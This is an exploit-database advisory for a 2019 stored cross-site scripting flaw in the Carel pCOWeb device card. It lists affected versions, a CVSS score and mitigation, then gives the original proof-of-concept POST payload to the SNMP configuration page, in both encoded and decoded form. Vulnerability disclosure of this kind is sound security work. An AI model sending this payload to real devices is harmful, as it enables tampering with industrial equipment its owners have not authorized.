Carel pCOWeb - Stored XSS - exploit.company

vendor:

Carel pCOWeb

by:

Luca.Chiou

5.5

CVSS

MEDIUM

Stored XSS

CWE

Product Name: Carel pCOWeb

Affected Version From: all versions prior to B1.2.1

Affected Version To: B1.2.1

Patch Exists: YES

Related CWE:

CPE: a:carel:pcoweb

Metasploit:

Other Scripts:

Platforms Tested: Proprietary devices

2019

Carel pCOWeb – Stored XSS

In Carel pCOWeb web page, user can modify the system configuration by accessing the /config/pw_snmp.html. Attackers can inject malicious XSS code in post data. The XSS code will be stored in the database, causing a stored XSS vulnerability.

Mitigation:

Implement input validation and sanitization techniques to prevent XSS attacks. Apply security updates to upgrade to version B1.2.1 or higher.

Source

Exploit-DB raw data:

# Exploit Title: Carel pCOWeb - Stored XSS
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.carel.com/
# Version: Carel pCOWeb all versions prior to B1.2.1
# Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card

# 1. Description:
# In Carel pCOWeb web page,
# user can modify the system configuration by access the /config/pw_snmp.html.
# Attackers can inject malicious XSS code in post data.
# The XSS code will be stored in database, so that cause a stored XSS vulnerability.

# 2. Proof of Concept:
# Browse http://<Your<http://%3cYour> Modem IP>/config/pw_snmp.html
# Send this post data:
%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
# The post data in URL decode format is:
?script:setdb('snmp','syscontact')="><script>alert(123)</script>